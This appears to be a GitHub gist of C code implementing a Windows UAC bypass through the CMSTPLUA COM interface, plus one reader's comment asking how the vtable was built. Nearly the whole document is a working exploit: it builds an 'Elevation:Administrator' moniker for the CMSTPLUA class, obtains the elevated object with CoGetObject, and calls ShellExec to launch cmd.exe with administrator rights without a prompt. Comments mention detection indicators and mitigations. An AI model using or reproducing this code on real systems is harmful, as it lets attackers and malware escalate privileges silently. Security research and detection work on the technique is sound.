
@hfiref0x
Created August 16, 2017 03:31
UAC bypass using CMSTPLUA COM interface
/*
 * Hand-written C vtable for the CMSTPLUA ICMLuaUtil COM interface.
 *
 * Only the slot layout matters: the first three entries are IUnknown
 * (QueryInterface/AddRef/Release), and every entry named MethodN is a
 * placeholder whose real name and parameters are not reproduced here.  The
 * placeholders exist solely so that ShellExec lands in the correct slot
 * (the 10th entry, index 9).  Of these, Method41_Test below invokes only
 * ShellExec and Release.
 *
 * NOTE(review): the placeholder slots are declared with a single `This`
 * argument.  That is enough to keep the layout correct, but calling any of
 * them through this declaration would pass the wrong arguments.
 */
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
    BEGIN_INTERFACE
    /* IUnknown slots 0-2 */
    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in ICMLuaUtil * This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void **ppvObject);
    ULONG(STDMETHODCALLTYPE *AddRef)(
        __RPC__in ICMLuaUtil * This);
    ULONG(STDMETHODCALLTYPE *Release)(
        __RPC__in ICMLuaUtil * This);
    /* Slots 3-8: layout placeholders, never called here */
    HRESULT(STDMETHODCALLTYPE *Method1)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method2)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method3)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method4)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method5)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method6)(
        __RPC__in ICMLuaUtil * This);
    /* Slot 9: the only non-IUnknown method this file uses.  Parameters
     * mirror ShellExecute-style arguments (file, parameters, directory,
     * SEE_MASK_* flags, SW_* show command). */
    HRESULT(STDMETHODCALLTYPE *ShellExec)(
        __RPC__in ICMLuaUtil * This,
        _In_ LPCTSTR lpFile,
        _In_opt_ LPCTSTR lpParameters,
        _In_opt_ LPCTSTR lpDirectory,
        _In_ ULONG fMask,
        _In_ ULONG nShow
        );
    /* Slots 10-22: further layout placeholders, never called here */
    HRESULT(STDMETHODCALLTYPE *Method8)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method9)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method10)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method11)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method12)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method13)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method14)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method15)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method16)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method17)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method18)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method19)(
        __RPC__in ICMLuaUtil * This);
    HRESULT(STDMETHODCALLTYPE *Method20)(
        __RPC__in ICMLuaUtil * This);
    END_INTERFACE
} *PICMLuaUtilVtbl;

/* Interface object: a single pointer to the vtable above, the usual C-style
 * COM object layout. */
interface ICMLuaUtil
{
    CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};

/* CLSID of the CMSTPLUA class and IID of ICMLuaUtil, kept as wide strings
 * because they are parsed with CLSIDFromString/IIDFromString and the CLSID
 * is also appended verbatim to the elevation moniker in Method41_Test.
 * These two values are what a detection rule for this technique would key on. */
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
/*
 * Method41_Test - exercises ICMLuaUtil::ShellExec through the COM
 * elevation moniker.
 *
 * Flow: parse the CLSID/IID strings, build the moniker
 * "Elevation:Administrator!new:<CLSID>", obtain the object with CoGetObject
 * (out-of-process, CLSCTX_LOCAL_SERVER), call ShellExec on it, then Release.
 * Because the object is activated via the elevation moniker, the ShellExec
 * call is serviced by the elevated server rather than by this process; per
 * the gist title that is what makes it a UAC bypass, and it is the behaviour
 * a defender wants to detect (the elevated CMSTPLUA server spawning a
 * process on behalf of a medium-integrity caller).
 *
 * Preconditions not visible here: COM must already be initialized on the
 * calling thread, since CoGetObject requires it - presumably done by the
 * caller.  _strcpy/_strcat are project-local helpers, not CRT functions.
 *
 * Error handling: each failure simply breaks out of the single-pass
 * do/while(FALSE) block.  The HRESULT of ShellExec is stored in r but never
 * inspected and nothing is returned - this is a test harness only.
 *
 * Mitigation context (verify on the build in question): the silent
 * elevation relied on here depends on the configured UAC notification
 * level; at the highest setting the elevation moniker is expected to prompt
 * rather than elevate silently.
 */
VOID Method41_Test()
{
    HRESULT r = E_FAIL;
    BOOL bCond = FALSE;               /* always FALSE: the loop body runs exactly once */
    IID xIID_ICMLuaUtil;
    CLSID xCLSID_ICMLuaUtil;
    ICMLuaUtil *CMLuaUtil = NULL;
    BIND_OPTS3 bop;
    WCHAR szElevationMoniker[MAX_PATH];

    do {
        /* Both helpers return S_OK (== NOERROR) on success; the two
         * comparisons are equivalent despite the differing constants. */
        if (CLSIDFromString(T_CLSID_CMSTPLUA, &xCLSID_ICMLuaUtil) != NOERROR) {
            break;
        }
        if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
            break;
        }

        /* Moniker is built from two compile-time constants, so MAX_PATH
         * WCHARs is ample; the buffer is zeroed first so it is always
         * NUL-terminated. */
        RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
        _strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
        _strcat(szElevationMoniker, T_CLSID_CMSTPLUA);

        /* BIND_OPTS3 with cbStruct set so CoGetObject reads the extended
         * fields; the elevation moniker expects an out-of-process
         * (CLSCTX_LOCAL_SERVER) activation. */
        RtlSecureZeroMemory(&bop, sizeof(bop));
        bop.cbStruct = sizeof(bop);
        bop.dwClassContext = CLSCTX_LOCAL_SERVER;

        /* On success CMLuaUtil holds a reference that must be released below. */
        r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIID_ICMLuaUtil, &CMLuaUtil);
        if (r != S_OK) {
            break;
        }

        /* The call itself: ShellExecute-style arguments forwarded to the
         * server.  Presumably the resulting process is created on the server
         * side, which is the event a detection would observe. The returned
         * HRESULT is not checked. */
        r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, L"C:\\windows\\system32\\cmd.exe", NULL, NULL, SEE_MASK_DEFAULT, SW_SHOW);

    } while (bCond);

    /* Reached on every path; CMLuaUtil is non-NULL only after a successful CoGetObject. */
    if (CMLuaUtil != NULL) {
        CMLuaUtil->lpVtbl->Release(CMLuaUtil);
    }
}
@secxue

secxue commented Sep 6, 2022

Hi bro, how was the ICMLuaUtilVtbl structure generated?
